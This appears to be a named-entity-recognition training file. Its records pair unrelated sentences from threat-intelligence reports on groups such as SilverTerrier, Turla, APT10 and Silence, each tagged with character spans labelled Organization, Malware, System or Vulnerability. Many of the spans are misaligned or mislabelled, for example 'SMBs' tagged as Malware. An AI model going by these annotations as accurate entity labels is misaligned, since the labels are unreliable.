{"text": "A few months later , in February 2017 , the FBI published a press release revising its estimates and stating that \" Since January 2015 , there has been a 1,300 percent increase in identified exposed losses , now totaling over $3 billion \" Recognizing the significance of this threat group , Unit 42 continues to track the evolution of Nigerian cybercrime under the code name SilverTerrier . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": [{"start": 44, "end": 47, "label": "Organization"}, {"start": 276, "end": 288, "label": "Organization"}, {"start": 291, "end": 298, "label": "Organization"}, {"start": 375, "end": 388, "label": "Organization"}, {"start": 406, "end": 414, "label": "Organization"}, {"start": 517, "end": 526, "label": "Organization"}]}
{"text": "In the 2016 Internet Crime Report published by the FBI , BEC was specifically highlighted as a \" Hot Topic \" , having been attributed to more than US$360 million in losses and gaining status as its own category of attack . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": [{"start": 51, "end": 54, "label": "Organization"}, {"start": 290, "end": 309, "label": "Organization"}, {"start": 314, "end": 335, "label": "Organization"}]}
{"text": "Recognizing the significance of this threat group , Unit 42 continues to track the evolution of Nigerian cybercrime under the code name SilverTerrier . It's possible TG-3390 used a waterhole to infect data center employees .", "spans": [{"start": 37, "end": 49, "label": "Organization"}, {"start": 52, "end": 59, "label": "Organization"}, {"start": 136, "end": 149, "label": "Organization"}, {"start": 166, "end": 173, "label": "Organization"}, {"start": 201, "end": 222, "label": "Organization"}]}
{"text": "Pony is a fairly common malware family that has existed in various forms since 2012 , with our first indications of Nigerian use occurring in August 2014 . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 262, "end": 272, "label": "Organization"}, {"start": 366, "end": 375, "label": "Organization"}]}
{"text": "Of the four , KeyBase stands out due to its rapid rise in popularity , with a peak deployment of 160 samples per month and usage by 46 separate SilverTerrier actors , followed by a fairly rapid decline . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations \u2014 including organizations related to Chinese minority ethnic groups .", "spans": [{"start": 14, "end": 21, "label": "System"}, {"start": 144, "end": 164, "label": "Organization"}, {"start": 266, "end": 285, "label": "Organization"}, {"start": 288, "end": 296, "label": "Organization"}, {"start": 301, "end": 313, "label": "Organization"}, {"start": 316, "end": 325, "label": "Organization"}, {"start": 332, "end": 355, "label": "Organization"}, {"start": 401, "end": 423, "label": "Organization"}]}
{"text": "NetWire , DarkComet , NanoCore , LuminosityLink , Remcos and Imminent Monitor are all designed to provide remote access to compromised systems . In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 10, "end": 19, "label": "System"}, {"start": 22, "end": 30, "label": "System"}, {"start": 33, "end": 47, "label": "System"}, {"start": 50, "end": 56, "label": "System"}, {"start": 61, "end": 77, "label": "System"}, {"start": 98, "end": 119, "label": "Malware"}, {"start": 238, "end": 256, "label": "Organization"}, {"start": 282, "end": 291, "label": "Organization"}]}
{"text": "Unit 42 analyzed the use of these six malware families and found that Nigerian actors are currently producing an average of 146 unique samples of malware per month ( see Figure 6 ) . Turla is a notorious group that has been targeting government officials .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 79, "end": 85, "label": "Organization"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 234, "end": 254, "label": "Organization"}]}
{"text": "Given this requirement , SilverTerrier actors often rely on Dynamic DNS and virtual private servers to provide a layer of obfuscation to protect their identities . Turla is a notorious group that has been targeting diplomats .", "spans": [{"start": 25, "end": 45, "label": "Organization"}, {"start": 60, "end": 71, "label": "System"}, {"start": 76, "end": 99, "label": "System"}, {"start": 164, "end": 169, "label": "Organization"}, {"start": 215, "end": 224, "label": "Organization"}]}
{"text": "When using email scams , SilverTerrier actors preferred to use large target audiences , which maximized the likelihood of success with very little risk . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": [{"start": 25, "end": 45, "label": "Organization"}, {"start": 175, "end": 185, "label": "Malware"}, {"start": 264, "end": 273, "label": "Organization"}]}
{"text": "Unit 42 tracks roughly 300 SilverTerrier actors who have registered a combined 11,600 domains over the past five years . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 27, "end": 47, "label": "Organization"}, {"start": 198, "end": 207, "label": "Organization"}]}
{"text": "To support the rapid growth and pace of malware distribution efforts , SilverTerrier actors are in constant need of domains to serve as C2 nodes . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": [{"start": 71, "end": 91, "label": "Organization"}, {"start": 166, "end": 175, "label": "Malware"}, {"start": 200, "end": 209, "label": "Organization"}]}
{"text": "To that end , it is very unlikely that the United States government or Shell , a global energy company , would commission SilverTerrier actors to develop domains that impersonate their own legitimate websites and services . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": [{"start": 57, "end": 67, "label": "Organization"}, {"start": 81, "end": 102, "label": "Organization"}, {"start": 122, "end": 142, "label": "Organization"}, {"start": 231, "end": 236, "label": "Organization"}, {"start": 305, "end": 311, "label": "System"}, {"start": 324, "end": 351, "label": "Organization"}]}
{"text": "The credentials they use to register their malware infrastructure are easily associated with their public social media accounts on Google\u00ae , Facebook\u00ae , MySpace\u00ae , Instagram\u00ae , and various dating and blogging sites . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": [{"start": 106, "end": 118, "label": "Organization"}, {"start": 131, "end": 138, "label": "Organization"}, {"start": 141, "end": 150, "label": "Organization"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 164, "end": 174, "label": "Organization"}, {"start": 189, "end": 214, "label": "Organization"}, {"start": 232, "end": 243, "label": "Malware"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 319, "end": 324, "label": "Organization"}, {"start": 372, "end": 381, "label": "Organization"}, {"start": 384, "end": 403, "label": "Organization"}, {"start": 406, "end": 430, "label": "Organization"}, {"start": 437, "end": 459, "label": "Organization"}]}
{"text": "Earlier this year , Cybereason identified an advanced , persistent attack targeting telecommunications providers that has been underway for years , soon after deploying into the environment . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": [{"start": 20, "end": 30, "label": "Organization"}, {"start": 84, "end": 112, "label": "Organization"}, {"start": 192, "end": 198, "label": "Organization"}, {"start": 287, "end": 317, "label": "Organization"}, {"start": 320, "end": 338, "label": "Organization"}, {"start": 354, "end": 371, "label": "Organization"}, {"start": 383, "end": 401, "label": "Organization"}]}
{"text": "Based on the data available to us , Operation Soft Cell has been active since at least 2012 , though some evidence suggests even earlier activity by the threat actor against telecommunications providers . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": [{"start": 153, "end": 165, "label": "Organization"}, {"start": 174, "end": 202, "label": "Organization"}, {"start": 205, "end": 225, "label": "Organization"}]}
{"text": "Threat actors , especially those at the level of nation state , are seeking opportunities to attack these organizations , conducting elaborate , advanced operations to gain leverage , seize strategic assets , and collect information . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 280, "end": 316, "label": "Organization"}]}
{"text": "The tools and techniques used throughout these attacks are consistent with several Chinese threat actors , such as APT10 , a threat actor believed to operate on behalf of the Chinese Ministry of State Security . Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist \u2013 an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": [{"start": 91, "end": 104, "label": "Organization"}, {"start": 115, "end": 120, "label": "Organization"}, {"start": 125, "end": 137, "label": "Organization"}, {"start": 294, "end": 319, "label": "Organization"}, {"start": 325, "end": 335, "label": "Organization"}]}
{"text": "The threat actor attempted to compromise critical assets , such as database servers , billing servers , and the active directory . Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 147, "end": 151, "label": "Organization"}, {"start": 165, "end": 178, "label": "Organization"}, {"start": 183, "end": 192, "label": "Organization"}]}
{"text": "The attack began with a web shell running on a vulnerable , publicly-facing server , from which the attackers gathered information about the network and propagated across the network . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer .", "spans": [{"start": 24, "end": 33, "label": "System"}, {"start": 100, "end": 109, "label": "Organization"}, {"start": 269, "end": 291, "label": "Organization"}, {"start": 313, "end": 340, "label": "Organization"}]}
{"text": "The initial indicator of the attack was a malicious web shell that was detected on an IIS server , coming out of the w3wp.exe process . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks .", "spans": [{"start": 117, "end": 125, "label": "Malware"}, {"start": 136, "end": 142, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 318, "end": 330, "label": "Organization"}, {"start": 407, "end": 416, "label": "Organization"}]}
{"text": "An investigation of the web shell , later classified as a modified version of the China Chopper web shell , uncovered several attack phases and TTPs . Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": [{"start": 82, "end": 105, "label": "System"}, {"start": 151, "end": 157, "label": "Organization"}, {"start": 171, "end": 190, "label": "Organization"}]}
{"text": "The threat actor was able to leverage the web shell to run reconnaissance commands , steal credentials , and deploy other tools . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 42, "end": 51, "label": "System"}, {"start": 184, "end": 189, "label": "Organization"}]}
{"text": "The web shell parameters in this attack match to the China Chopper parameters , as described in FireEye 's analysis of China Chopper . Our research indicates that it has started targeting Japanese users .", "spans": [{"start": 53, "end": 66, "label": "Organization"}, {"start": 96, "end": 103, "label": "Organization"}, {"start": 119, "end": 132, "label": "Organization"}, {"start": 188, "end": 202, "label": "Organization"}]}
{"text": "It is used to remotely control web servers , and has been used in many attacks against Australian web hosting providers . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": [{"start": 102, "end": 119, "label": "Organization"}, {"start": 190, "end": 194, "label": "Malware"}, {"start": 232, "end": 243, "label": "Organization"}]}
{"text": "This tool has been used by several Chinese-affiliated threat actors , such as APT 27 and APT 40 . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": [{"start": 54, "end": 67, "label": "Organization"}, {"start": 78, "end": 84, "label": "Organization"}, {"start": 89, "end": 95, "label": "Organization"}, {"start": 98, "end": 111, "label": "Organization"}, {"start": 277, "end": 287, "label": "Organization"}, {"start": 321, "end": 339, "label": "Organization"}]}
{"text": "The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": [{"start": 53, "end": 65, "label": "Organization"}, {"start": 81, "end": 89, "label": "System"}, {"start": 95, "end": 112, "label": "Malware"}, {"start": 127, "end": 134, "label": "Vulnerability"}, {"start": 208, "end": 213, "label": "System"}, {"start": 258, "end": 263, "label": "System"}]}
{"text": "The threat actor relied on WMI and PsExec to move laterally and install their tools across multiple assets . Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 27, "end": 30, "label": "System"}, {"start": 35, "end": 41, "label": "System"}, {"start": 195, "end": 213, "label": "Organization"}, {"start": 218, "end": 229, "label": "Organization"}]}
{"text": "Nbtscan has been used by APT10 in Operation Cloud Hopper to search for services of interest across the IT estate and footprint endpoints of interest . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 25, "end": 30, "label": "Organization"}, {"start": 103, "end": 105, "label": "Organization"}, {"start": 177, "end": 183, "label": "Malware"}, {"start": 202, "end": 207, "label": "Organization"}]}
{"text": "A second method the threat actor used to maintain access across the compromised assets was through the deployment of the PoisonIvy RAT ( PIVY ) . The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party .", "spans": [{"start": 20, "end": 32, "label": "Organization"}, {"start": 121, "end": 134, "label": "System"}, {"start": 137, "end": 141, "label": "System"}, {"start": 177, "end": 186, "label": "Organization"}, {"start": 210, "end": 229, "label": "Organization"}, {"start": 232, "end": 249, "label": "Organization"}, {"start": 264, "end": 272, "label": "Organization"}, {"start": 305, "end": 326, "label": "Organization"}]}
{"text": "This infamous RAT has been associated with many different Chinese threat actors , including APT10 , APT1 , and DragonOK . For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": [{"start": 14, "end": 17, "label": "System"}, {"start": 66, "end": 79, "label": "Organization"}, {"start": 92, "end": 97, "label": "Organization"}, {"start": 100, "end": 104, "label": "Organization"}, {"start": 111, "end": 119, "label": "Organization"}, {"start": 154, "end": 164, "label": "Malware"}, {"start": 191, "end": 203, "label": "Malware"}, {"start": 237, "end": 245, "label": "Organization"}]}
{"text": "It is a powerful , multi-featured RAT that lets a threat actor take total control over a machine . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": [{"start": 19, "end": 37, "label": "System"}, {"start": 50, "end": 62, "label": "Organization"}, {"start": 204, "end": 223, "label": "Organization"}, {"start": 232, "end": 253, "label": "Organization"}]}
{"text": "In an attempt to hide the contents of the stolen data , the threat actor used winrar to compress and password-protect it . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": [{"start": 60, "end": 72, "label": "Organization"}, {"start": 78, "end": 84, "label": "System"}, {"start": 123, "end": 141, "label": "Organization"}, {"start": 225, "end": 236, "label": "Organization"}, {"start": 239, "end": 245, "label": "Organization"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 261, "end": 268, "label": "Malware"}, {"start": 309, "end": 316, "label": "Malware"}, {"start": 317, "end": 324, "label": "Malware"}]}
{"text": "The winrar binaries and compressed data were found mostly in the Recycle Bin folder , a TTP that was previously observed in APT10-related attacks , as well as others . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": [{"start": 4, "end": 10, "label": "System"}, {"start": 65, "end": 83, "label": "System"}, {"start": 88, "end": 91, "label": "System"}, {"start": 235, "end": 256, "label": "Organization"}, {"start": 259, "end": 267, "label": "Organization"}, {"start": 270, "end": 287, "label": "Organization"}, {"start": 290, "end": 308, "label": "Organization"}, {"start": 313, "end": 318, "label": "Organization"}, {"start": 323, "end": 332, "label": "Organization"}, {"start": 339, "end": 362, "label": "Organization"}]}
{"text": "This ' connection bouncer ' tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic . The computers of diplomats , military attach\u00e9s , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) .", "spans": [{"start": 7, "end": 25, "label": "System"}, {"start": 42, "end": 54, "label": "Organization"}, {"start": 64, "end": 85, "label": "Malware"}, {"start": 164, "end": 173, "label": "Organization"}, {"start": 176, "end": 193, "label": "Organization"}, {"start": 196, "end": 214, "label": "Organization"}, {"start": 217, "end": 228, "label": "Organization"}, {"start": 232, "end": 247, "label": "Organization"}, {"start": 250, "end": 261, "label": "Organization"}]}
{"text": "In order to exfiltrate data from a network segment not connected to the Internet , the threat actor deployed a modified version of hTran . The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": [{"start": 87, "end": 99, "label": "Organization"}, {"start": 131, "end": 136, "label": "System"}, {"start": 159, "end": 165, "label": "Malware"}, {"start": 211, "end": 217, "label": "Malware"}, {"start": 291, "end": 308, "label": "Organization"}]}
{"text": "There have been numerous reports of hTran being used by different Chinese threat actors , including : APT3 , APT27 and DragonOK . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": [{"start": 36, "end": 41, "label": "System"}, {"start": 74, "end": 87, "label": "Organization"}, {"start": 102, "end": 106, "label": "Organization"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 119, "end": 127, "label": "Organization"}, {"start": 201, "end": 209, "label": "Organization"}]}
{"text": "The threat actor made some modifications to the original source code of hTran . Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 72, "end": 77, "label": "System"}, {"start": 240, "end": 249, "label": "Organization"}]}
{"text": "The threat actor had a specific pattern of behavior that allowed us to understand their modus operandi : they used one server with the same IP address for multiple operations . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 246, "end": 259, "label": "Organization"}, {"start": 264, "end": 290, "label": "Organization"}, {"start": 420, "end": 428, "label": "Organization"}]}
{"text": "There are previous reports of threat actors including APT10 and APT1 using dynamic DNS . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": [{"start": 30, "end": 43, "label": "Organization"}, {"start": 54, "end": 59, "label": "Organization"}, {"start": 64, "end": 68, "label": "Organization"}, {"start": 75, "end": 86, "label": "System"}, {"start": 147, "end": 155, "label": "Organization"}]}
{"text": "Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries . The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": [{"start": 73, "end": 85, "label": "Organization"}, {"start": 125, "end": 145, "label": "Organization"}, {"start": 173, "end": 177, "label": "Malware"}, {"start": 178, "end": 185, "label": "Malware"}, {"start": 205, "end": 213, "label": "Organization"}, {"start": 293, "end": 313, "label": "Organization"}, {"start": 317, "end": 328, "label": "Organization"}, {"start": 363, "end": 373, "label": "System"}]}
{"text": "The data exfiltrated by this threat actor , in conjunction with the TTPs and tools used , allowed us to determine with a very high probability that the threat actor behind these malicious operations is backed by a nation state , and is affiliated with China . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": [{"start": 29, "end": 41, "label": "Organization"}, {"start": 152, "end": 164, "label": "Organization"}, {"start": 349, "end": 367, "label": "Organization"}, {"start": 445, "end": 460, "label": "Organization"}]}
{"text": "Symantec saw the first evidence of Sowbug-related activity with the discovery in March 2017 of an entirely new piece of malware called Felismus used against a target in Southeast Asia . As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 135, "end": 143, "label": "System"}, {"start": 307, "end": 324, "label": "Organization"}, {"start": 369, "end": 394, "label": "Organization"}]}
{"text": "Symantec saw the first evidence of Sowbug group with the discovery in March 2017 of an entirely new piece of malware called Felismus used against a target in Southeast Asia . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 35, "end": 47, "label": "Organization"}, {"start": 124, "end": 132, "label": "System"}, {"start": 179, "end": 205, "label": "Malware"}, {"start": 241, "end": 261, "label": "Organization"}, {"start": 280, "end": 293, "label": "Organization"}]}
{"text": "Symantec has also been able to connect earlier attack campaigns with Sowbug , demonstrating that it has been active since at least early-2015 and may have been operating even earlier . LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 194, "end": 200, "label": "Organization"}, {"start": 271, "end": 284, "label": "Organization"}]}
{"text": "To date , Sowbug appears to be focused mainly on government entities in South America and Southeast Asia and has infiltrated organizations in Argentina , Brazil , Ecuador , Peru , Brunei and Malaysia . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": [{"start": 10, "end": 16, "label": "Organization"}, {"start": 49, "end": 68, "label": "Organization"}, {"start": 113, "end": 138, "label": "Organization"}, {"start": 238, "end": 251, "label": "Organization"}, {"start": 333, "end": 336, "label": "Indicator"}]}
{"text": "For example , in a 2015 attack on one South American foreign ministry , the group appeared to be searching for very specific information . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": [{"start": 76, "end": 81, "label": "Organization"}]}
{"text": "The first evidence of its intrusion dated from May 6 , 2015 but activity appeared to have begun in earnest on May 12 . They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": [{"start": 169, "end": 186, "label": "Organization"}, {"start": 191, "end": 207, "label": "Organization"}]}
{"text": "In total , the attackers maintained a presence on the target 's network for four months between May and September 2015 . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 15, "end": 24, "label": "Organization"}, {"start": 147, "end": 163, "label": "Indicator"}, {"start": 183, "end": 221, "label": "Organization"}, {"start": 224, "end": 228, "label": "Organization"}, {"start": 250, "end": 260, "label": "Organization"}, {"start": 265, "end": 278, "label": "Organization"}]}
{"text": "We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": [{"start": 28, "end": 34, "label": "Organization"}, {"start": 83, "end": 93, "label": "Organization"}, {"start": 107, "end": 115, "label": "Organization"}, {"start": 216, "end": 223, "label": "Organization"}, {"start": 300, "end": 316, "label": "Organization"}]}
{"text": "Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": [{"start": 20, "end": 34, "label": "Malware"}, {"start": 54, "end": 60, "label": "Organization"}, {"start": 134, "end": 157, "label": "Organization"}, {"start": 278, "end": 289, "label": "Malware"}, {"start": 314, "end": 323, "label": "Organization"}, {"start": 326, "end": 335, "label": "Organization"}, {"start": 340, "end": 363, "label": "Organization"}]}
{"text": "North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": [{"start": 137, "end": 146, "label": "Organization"}, {"start": 158, "end": 165, "label": "Organization"}, {"start": 300, "end": 323, "label": "Organization"}, {"start": 326, "end": 335, "label": "Organization"}, {"start": 342, "end": 362, "label": "Organization"}, {"start": 384, "end": 404, "label": "Organization"}, {"start": 409, "end": 418, "label": "Organization"}]}
{"text": "FireEye has detected more than 20 cyber threat groups suspected to be sponsored by at least four other nation-states attempting to gain access to targets in the energy sector that could have been used to cause disruptions . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 47, "end": 53, "label": "Organization"}, {"start": 336, "end": 363, "label": "Organization"}]}
{"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker . Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": [{"start": 0, "end": 20, "label": "Organization"}, {"start": 64, "end": 70, "label": "Organization"}, {"start": 102, "end": 108, "label": "System"}, {"start": 127, "end": 141, "label": "Organization"}]}
{"text": "FormBook OverviewFormBook is a data stealer and form grabber that has been advertised in various hacking forums since early 2016 . They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": [{"start": 0, "end": 25, "label": "System"}, {"start": 221, "end": 265, "label": "Organization"}, {"start": 270, "end": 274, "label": "Organization"}]}
{"text": "The malware may inject itself into browser processes and explorer.exe . However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 57, "end": 69, "label": "Malware"}, {"start": 96, "end": 102, "label": "System"}, {"start": 116, "end": 130, "label": "Organization"}]}
{"text": "The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information stealing FormBook malware . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 244, "end": 251, "label": "Organization"}, {"start": 305, "end": 311, "label": "System"}, {"start": 339, "end": 353, "label": "Organization"}]}
{"text": "Much of the activity was observed in the United States (Figure 11) , and the most targeted industry vertical was Aerospace/Defense Contractors (Figure 12) . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": [{"start": 113, "end": 130, "label": "Organization"}, {"start": 338, "end": 347, "label": "Organization"}, {"start": 353, "end": 371, "label": "Organization"}]}
{"text": "In the last few weeks , FormBook was seen downloading other malware families such as NanoCore . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": [{"start": 24, "end": 32, "label": "Malware"}, {"start": 85, "end": 93, "label": "Malware"}, {"start": 226, "end": 230, "label": "System"}, {"start": 297, "end": 325, "label": "Organization"}, {"start": 334, "end": 359, "label": "Organization"}]}
{"text": "We have associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 137, "end": 144, "label": "Organization"}, {"start": 145, "end": 155, "label": "Organization"}, {"start": 225, "end": 233, "label": "Organization"}]}
{"text": "The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": [{"start": 76, "end": 83, "label": "Organization"}, {"start": 122, "end": 141, "label": "Malware"}, {"start": 273, "end": 286, "label": "Organization"}, {"start": 291, "end": 299, "label": "Organization"}]}
{"text": "We have previously observed APT19 steal data from law and investment firms for competitive economic purposes . After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 197, "end": 206, "label": "Organization"}, {"start": 216, "end": 234, "label": "Organization"}]}
{"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . It's coincident that both 'darkhydrus' APT group name and \u2018Williams\u2019 user name in PDB path found in this Twitter user .", "spans": [{"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 100, "end": 115, "label": "Malware"}, {"start": 153, "end": 165, "label": "Organization"}, {"start": 185, "end": 195, "label": "Organization"}, {"start": 232, "end": 244, "label": "Organization"}]}
{"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China .", "spans": [{"start": 44, "end": 59, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 257, "end": 278, "label": "Organization"}]}
{"text": "Furthermore , there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations . In the latest attack , Donot group is targeting Pakistani businessman working in China", "spans": [{"start": 41, "end": 46, "label": "Organization"}, {"start": 87, "end": 95, "label": "Organization"}, {"start": 100, "end": 110, "label": "Organization"}, {"start": 164, "end": 175, "label": "Organization"}, {"start": 189, "end": 210, "label": "Organization"}]}
